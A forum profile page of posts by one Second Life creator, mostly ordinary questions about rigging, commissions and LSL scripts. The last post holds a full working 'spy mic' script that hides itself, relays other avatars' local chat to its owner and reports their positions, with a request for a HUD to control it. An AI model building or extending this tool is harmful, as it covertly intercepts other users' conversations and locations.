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Everything posted by BlackShyne

  1. May I ask what makes the physic ***** move and how is it rigged?
  2. thank you for your help 😁
  3. Creating a chain that hangs from my hand and moves when I walk. What would be the best method of creating this without using Animesh and stop motion? thanks in advance for any tips.
  4. I Have a few Ideas for few different animations. Pretty simple work i believe. Would like to find someone that is open to future projects as well.
  5. I am searching for a graphic designer to help me create branding for my store, consisting of two product packaging hud, a color-changing HUD, and a reusable Ad product template. And maybe a logo revamp. If interested fill out the link below. https://docs.google.com/forms/d/e/1FAIpQLSfxedHtgRQOa_ew0LhHHUNLmttRi6zK0qTBvCCMPz2HN2cdTw/viewform?usp=sf_link
  6. Thank you for checking out my requested found some people suitable for the job.
  7. thanks for the suggestions i will give them a try.
  8. Yeah, it's unfortunate. Hopefully i can find someone i can work with. thank you for your suggestions and taken the time to reply.
  9. thanks. i will ask now. unfortunately they do no sale full perm scripts.
  10. the firestorm website says Firestorm Release but it can be a beta out somewhere idk lol but is there any way i can get in contact with you inworld and see if i can get the scripts done by you?
  11. I recently had a script created for a jewelry box. The person sent over a perfectly good working version along with the scripts. I have been trying for days now to recreate the working box with the same box i sent for him to work with but it seems to not work when I try to recreate it. The person who helped me with the script sent over a non mod script so I can't show any Code with a detailed notecard i followed. i have even sent him over the non working version and he sent me back a fully mod working version just the scripts are no mod. i have tried resetting scripts, setting them to running, using the same scripts that came from the working version, every keyword is the exact same i have even tried on the beta grid and nothing worked. im using the latest version of firestorm at this time FIRESTORM i welcome any suggestions and thank you for taken the time out to read my post.
  12. I would like to know how to make this script effect full link sets and not just an individual prim? key owner; integer ISSEQUENTIAL = 1; integer listen_handle; float colordelay = 2.0; // this is the default color update frequency float unsaturation = 0.0; float opacity = 1.0; vector currentcolor = <1.0, 0.0, 0.0>; // switch to pure red on reset integer currentangle = 0; integer currentdir = 0; // 0 for red to green // 1 for green to blue // 2 for blue to red integer angle_increment = 3; // determines the number of steps around the hue wheel. // the lower the more steps, doesn't go over 90 // Always use a factor of 90 for better results // 3 or 5 are good values colorupdate() { // change current color if (ISSEQUENTIAL < 0) { // set a random color: currentcolor = <llFrand(1),llFrand(1),llFrand(1)>; } else { // rotate the color vector along X Y Z to vary between red, green and blue if (currentangle >= 90) { currentdir += 1; currentangle = 0; if ((currentdir >= 3) || (currentdir < 0)) currentdir = 0; } currentangle += angle_increment; } } colorchange() { float float_angle = ((float)currentangle) * DEG_TO_RAD; float sinelement = llSin(float_angle) * (1.0 - unsaturation) + unsaturation; float coselement = llCos(float_angle) * (1.0 - unsaturation) + unsaturation; if (ISSEQUENTIAL > 0) { if (currentdir == 0) { currentcolor = <coselement, sinelement, unsaturation>; } else if (currentdir == 1) { currentcolor = <unsaturation, coselement, sinelement>; } else if (currentdir == 2) { currentcolor = <sinelement, unsaturation, coselement>; } } llSetColor(currentcolor,ALL_SIDES); llMessageLinked(LINK_SET,105,(string)currentcolor, NULL_KEY); } default { state_entry() { llListenRemove(listen_handle); owner=llGetOwner(); listen_handle = llListen(23,"",owner,""); } timer() { colorupdate(); colorchange(); } listen(integer channel, string name, key id, string message) { if (message == "toggle") { ISSEQUENTIAL *= -1; } else if (message == "reset") { currentcolor = <1.0, 0.0, 0.0>; unsaturation = 0.0; currentangle = 0; currentdir = 0; ISSEQUENTIAL = 1; colordelay = 2.0; llSetColor(currentcolor,ALL_SIDES); llMessageLinked(LINK_SET,105,(string)currentcolor, NULL_KEY); llSetTimerEvent(colordelay); } else if (message == "start") { llSetTimerEvent(colordelay); } else if (message == "stop") { llSetTimerEvent(0); } else if (message == "clear") { llSetTimerEvent(0); currentcolor = <1.0, 1.0, 1.0>; llSetColor(currentcolor,ALL_SIDES); llMessageLinked(LINK_SET,105,(string)currentcolor, NULL_KEY); } else if (message == "blue") { llSetTimerEvent(0); unsaturation = 0.0; currentangle = 0; currentdir = 2; colorchange(); } else if (message == "green") { llSetTimerEvent(0); unsaturation = 0.0; currentangle = 0; currentdir = 1; colorchange(); } else if (message == "red") { llSetTimerEvent(0); unsaturation = 0.0; currentangle = 0; currentdir = 0; colorchange(); } else if (message == "black") { llSetTimerEvent(0); currentcolor = <0.0, 0.0, 0.0>; llSetColor(currentcolor,ALL_SIDES); llMessageLinked(LINK_SET,105,(string)currentcolor, NULL_KEY); } else if (message == "faster") { colordelay /= 2.0; if (colordelay < 0.25) colordelay = 0.25; llSetTimerEvent(colordelay); } else if (message == "slower") { colordelay *= 2.0; llSetTimerEvent(colordelay); } else if (message == "saturate") { unsaturation -= 0.1; if (unsaturation < 0.0) unsaturation = 0.0; colorchange(); } else if (message == "desaturate") { unsaturation += 0.1; if (unsaturation > 1.0) unsaturation = 1.0; colorchange(); } else if (message == "alpha") { opacity -= 0.1; if (opacity < 0.0) opacity = 0.0; llSetAlpha(opacity, ALL_SIDES); llMessageLinked(LINK_SET,106,(string)opacity,NULL_KEY); } else if (message == "dealpha") { opacity += 0.1; if (opacity > 1.0) opacity = 1.0; llSetAlpha(opacity, ALL_SIDES); llMessageLinked(LINK_SET,106,(string)opacity,NULL_KEY); } else if (message == "transparent") { opacity = 0.0; llSetAlpha(opacity, ALL_SIDES); llMessageLinked(LINK_SET,106,(string)opacity,NULL_KEY); } else if (message == "opaque") { opacity = 1.0; llSetAlpha(opacity, ALL_SIDES); llMessageLinked(LINK_SET,106,(string)opacity,NULL_KEY); } else if (message == "change") { colorupdate(); colorchange(); } } }// END //
  13. Can someone please help me create a hud for this script? I would like the hud to be able to active the script in replace of the local hi and bye activations. key crea; // ID del receptor integer dist = 10; // radio de la esfera del radar en metros, valores posibles dedse 0.1 hasta 96.0 string text; integer power = 1; list myListOLD; list myList; default { state_entry() { crea = llGetOwner(); llListen( 0, "", NULL_KEY, "" ); myListOLD=[]; llSetAlpha(0.0, ALL_SIDES); } on_rez(integer startup_param) { llResetScript(); } no_sensor() {myListOLD=[];} sensor(integer total_number) { integer i; myList=[]; for (i = 0; i < total_number; i++) { myList = (myList=[]) + myList + [llKey2Name(llDetectedKey(i))];} for (i = 0; i < total_number; i++) { if (llListFindList(myListOLD, [llList2String(myList,i)])==-1) { if (llKey2Name(llDetectedKey(i)) != "") {llInstantMessage(crea, llKey2Name(llDetectedKey(i)) + " is at " + llGetRegionName() + ": " + (string)llDetectedPos(i));} } } for (i = 0; i < llGetListLength(myListOLD); i++) { if (llListFindList(myList, [llList2String(myListOLD,i)])==-1) { if (llList2String(myListOLD,i)!=""){llInstantMessage(crea, llList2String(myListOLD,i) + " is out of signal.");} } } myListOLD=[]; for (i = 0; i < total_number; i++) { myListOLD = (myListOLD=[]) + myListOLD + [llKey2Name(llDetectedKey(i))]; } } listen(integer channel, string name, key id, string message) { if (id == crea) { if (message == "help") { llInstantMessage(crea, "Aviable commands: hi | bye | ocultar | ver el bug | distancia X | help"); } if (message == "hi") { power=0; llSensorRemove(); llInstantMessage(crea, "Spy mic stopped."); } else if (message == "bye") { power=1; llSensorRepeat("", "", AGENT, dist, PI, 3); llInstantMessage(crea, "Spy mic started within " + (string)dist+"m");} else if (message == "ocultar") { llSetAlpha(0.0, ALL_SIDES); llInstantMessage(crea, "Hidden spy mic."); } else if (message == "ver el bug") { llSetAlpha(1.0, ALL_SIDES); llInstantMessage(crea, "Visible soy mic."); } else if (llGetSubString(message,0,8) == "distancia") {dist=(integer)llGetSubString(message,10,-1); llInstantMessage(crea, "New distance: "+(string)dist+"m");if(power==1){llSensorRemove();llSensorRepeat("", "", AGENT, dist, PI, 3);}} } else if (power==1) { llInstantMessage(crea, llKey2Name(id) + ": " + message); } } }
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